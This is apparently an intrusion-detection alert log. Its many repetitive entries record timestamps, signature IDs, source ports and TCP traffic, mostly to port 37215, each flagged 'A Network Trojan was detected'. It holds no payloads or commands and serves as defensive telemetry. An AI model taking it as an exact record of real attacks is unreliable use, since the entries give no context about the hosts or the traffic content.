                  Timestamp:07/10/24-08:27:33.758146
                  SID:2835222
                  Source Port:39762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.656959
                  SID:2835222
                  Source Port:45496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.756462
                  SID:2835222
                  Source Port:46686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.388728
                  SID:2829579
                  Source Port:60378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.670364
                  SID:2835222
                  Source Port:57656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.325434
                  SID:2829579
                  Source Port:37134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.899186
                  SID:2835222
                  Source Port:53296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.009015
                  SID:2829579
                  Source Port:37872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.817935
                  SID:2829579
                  Source Port:51130
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.866134
                  SID:2835222
                  Source Port:50244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.856924
                  SID:2829579
                  Source Port:34050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.522836
                  SID:2829579
                  Source Port:47786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.481164
                  SID:2829579
                  Source Port:47384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.297607
                  SID:2829579
                  Source Port:37346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.566526
                  SID:2829579
                  Source Port:59882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.606068
                  SID:2835222
                  Source Port:46792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.651509
                  SID:2835222
                  Source Port:56264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.739348
                  SID:2835222
                  Source Port:54174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.494634
                  SID:2835222
                  Source Port:60798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.447518
                  SID:2835222
                  Source Port:37198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.238530
                  SID:2835222
                  Source Port:37698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.515269
                  SID:2829579
                  Source Port:46136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.793542
                  SID:2835222
                  Source Port:60442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.834981
                  SID:2835222
                  Source Port:42690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.228514
                  SID:2835222
                  Source Port:45280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.823408
                  SID:2835222
                  Source Port:58618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.122739
                  SID:2829579
                  Source Port:56180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.244914
                  SID:2829579
                  Source Port:48124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.923272
                  SID:2835222
                  Source Port:53758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.450781
                  SID:2835222
                  Source Port:39642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.360121
                  SID:2835222
                  Source Port:51226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.062166
                  SID:2829579
                  Source Port:52142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.325316
                  SID:2829579
                  Source Port:45866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.435270
                  SID:2829579
                  Source Port:33996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.374424
                  SID:2829579
                  Source Port:49256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.357505
                  SID:2835222
                  Source Port:60140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.631888
                  SID:2829579
                  Source Port:44690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.121135
                  SID:2829579
                  Source Port:37040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.767328
                  SID:2829579
                  Source Port:46670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.023936
                  SID:2829579
                  Source Port:58442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.031000
                  SID:2829579
                  Source Port:36706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.835442
                  SID:2829579
                  Source Port:35492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.054168
                  SID:2829579
                  Source Port:44000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.743244
                  SID:2835222
                  Source Port:38826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.500582
                  SID:2835222
                  Source Port:50240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.364667
                  SID:2829579
                  Source Port:47552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.702208
                  SID:2829579
                  Source Port:53924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.083284
                  SID:2835222
                  Source Port:47884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.793642
                  SID:2829579
                  Source Port:58930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.860039
                  SID:2835222
                  Source Port:42544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.398717
                  SID:2829579
                  Source Port:47454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.872449
                  SID:2829579
                  Source Port:45538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.565038
                  SID:2829579
                  Source Port:50320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.419826
                  SID:2829579
                  Source Port:43700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.434490
                  SID:2835222
                  Source Port:38496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.355415
                  SID:2835222
                  Source Port:47660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:16.994727
                  SID:2835222
                  Source Port:53278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.562651
                  SID:2829579
                  Source Port:35536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.091176
                  SID:2835222
                  Source Port:47316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.451839
                  SID:2829579
                  Source Port:57526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.785606
                  SID:2835222
                  Source Port:38538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.333878
                  SID:2829579
                  Source Port:53300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.827128
                  SID:2829579
                  Source Port:57780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.887836
                  SID:2829579
                  Source Port:59774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.996643
                  SID:2829579
                  Source Port:33592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.547260
                  SID:2829579
                  Source Port:39856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.957344
                  SID:2835222
                  Source Port:38066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.436089
                  SID:2835222
                  Source Port:49620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.126116
                  SID:2829579
                  Source Port:32920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.524985
                  SID:2829579
                  Source Port:33660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.907657
                  SID:2829579
                  Source Port:45804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.891770
                  SID:2829579
                  Source Port:36060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.988917
                  SID:2835222
                  Source Port:58486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.603771
                  SID:2835222
                  Source Port:51228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.893533
                  SID:2835222
                  Source Port:51994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.380057
                  SID:2829579
                  Source Port:54746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.892094
                  SID:2829579
                  Source Port:50444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.854887
                  SID:2829579
                  Source Port:51814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.945867
                  SID:2835222
                  Source Port:48694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.379672
                  SID:2835222
                  Source Port:45386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.210385
                  SID:2829579
                  Source Port:39932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.257130
                  SID:2835222
                  Source Port:34334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.019463
                  SID:2829579
                  Source Port:55274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.960962
                  SID:2829579
                  Source Port:52594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.099598
                  SID:2829579
                  Source Port:58882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.952819
                  SID:2835222
                  Source Port:40684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.134098
                  SID:2829579
                  Source Port:52650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.529944
                  SID:2829579
                  Source Port:59800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.946735
                  SID:2030490
                  Source Port:58698
                  Destination Port:5976
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.295536
                  SID:2829579
                  Source Port:57262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.453748
                  SID:2835222
                  Source Port:34730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.228280
                  SID:2835222
                  Source Port:54676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.457969
                  SID:2829579
                  Source Port:43470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.959709
                  SID:2829579
                  Source Port:45758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.856505
                  SID:2829579
                  Source Port:51686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.183618
                  SID:2829579
                  Source Port:58242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.549271
                  SID:2835222
                  Source Port:53796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.422786
                  SID:2835222
                  Source Port:32988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.151172
                  SID:2835222
                  Source Port:38218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.781541
                  SID:2829579
                  Source Port:35770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.639022
                  SID:2829579
                  Source Port:60362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.985444
                  SID:2835222
                  Source Port:56176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:16.996210
                  SID:2829579
                  Source Port:51312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.763647
                  SID:2829579
                  Source Port:53656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.655390
                  SID:2835222
                  Source Port:53968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.126957
                  SID:2835222
                  Source Port:38804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.453697
                  SID:2835222
                  Source Port:35404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.106544
                  SID:2835222
                  Source Port:34346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.330025
                  SID:2829579
                  Source Port:37098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.974548
                  SID:2835222
                  Source Port:40976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.504938
                  SID:2835222
                  Source Port:53736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.625504
                  SID:2835222
                  Source Port:50294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.665893
                  SID:2829579
                  Source Port:51824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.675135
                  SID:2829579
                  Source Port:38398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.376255
                  SID:2835222
                  Source Port:56996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.520024
                  SID:2835222
                  Source Port:54060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.314793
                  SID:2829579
                  Source Port:52682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.999319
                  SID:2835222
                  Source Port:33668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.151906
                  SID:2829579
                  Source Port:49100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.229660
                  SID:2835222
                  Source Port:57554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.799492
                  SID:2829579
                  Source Port:60586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.793523
                  SID:2829579
                  Source Port:41462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.573652
                  SID:2835222
                  Source Port:33814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.665893
                  SID:2835222
                  Source Port:46004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.777167
                  SID:2835222
                  Source Port:50070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.171769
                  SID:2829579
                  Source Port:50642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.882640
                  SID:2829579
                  Source Port:60190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.547644
                  SID:2829579
                  Source Port:36784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.615423
                  SID:2829579
                  Source Port:53594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:36.290826
                  SID:2835222
                  Source Port:46866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.735455
                  SID:2835222
                  Source Port:52586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.806534
                  SID:2835222
                  Source Port:48332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.807030
                  SID:2835222
                  Source Port:52598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.336235
                  SID:2829579
                  Source Port:51516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.841622
                  SID:2829579
                  Source Port:35786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.186875
                  SID:2829579
                  Source Port:34340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.824361
                  SID:2835222
                  Source Port:36948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.844556
                  SID:2829579
                  Source Port:35874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.245550
                  SID:2829579
                  Source Port:39990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.353550
                  SID:2835222
                  Source Port:49112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.110888
                  SID:2829579
                  Source Port:53490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.605186
                  SID:2829579
                  Source Port:38466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.931140
                  SID:2835222
                  Source Port:35812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.995730
                  SID:2835222
                  Source Port:42798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.041002
                  SID:2829579
                  Source Port:49578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.518150
                  SID:2835222
                  Source Port:56934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.121414
                  SID:2835222
                  Source Port:57976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.947908
                  SID:2835222
                  Source Port:59188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.201699
                  SID:2829579
                  Source Port:51974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.798485
                  SID:2829579
                  Source Port:49576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.122449
                  SID:2829579
                  Source Port:41300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.490780
                  SID:2829579
                  Source Port:59190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.456232
                  SID:2829579
                  Source Port:50186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.569542
                  SID:2829579
                  Source Port:43638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.161125
                  SID:2835222
                  Source Port:45322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.762388
                  SID:2835222
                  Source Port:42812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.117875
                  SID:2835222
                  Source Port:42982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.354266
                  SID:2835222
                  Source Port:43704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.020359
                  SID:2835222
                  Source Port:44402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.802588
                  SID:2835222
                  Source Port:38578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.027039
                  SID:2835222
                  Source Port:53936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.507738
                  SID:2835222
                  Source Port:38596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.897844
                  SID:2835222
                  Source Port:54154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.684661
                  SID:2835222
                  Source Port:44454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.038406
                  SID:2835222
                  Source Port:47272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.900163
                  SID:2829579
                  Source Port:56654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.457969
                  SID:2835222
                  Source Port:38834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.771211
                  SID:2835222
                  Source Port:37530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.302644
                  SID:2835222
                  Source Port:50442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.483673
                  SID:2835222
                  Source Port:41054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.377315
                  SID:2835222
                  Source Port:54646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.736673
                  SID:2835222
                  Source Port:48370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.221493
                  SID:2835222
                  Source Port:58042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.041359
                  SID:2835222
                  Source Port:51410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.483196
                  SID:2829579
                  Source Port:51230
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.175364
                  SID:2835222
                  Source Port:47292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.526473
                  SID:2829579
                  Source Port:50472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.982292
                  SID:2835222
                  Source Port:47490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.896757
                  SID:2829579
                  Source Port:40216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.904886
                  SID:2829579
                  Source Port:52586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.230941
                  SID:2829579
                  Source Port:46584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.959053
                  SID:2835222
                  Source Port:32956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.238024
                  SID:2835222
                  Source Port:44650
                  Destination Port:37215
                  Protocol:TCP
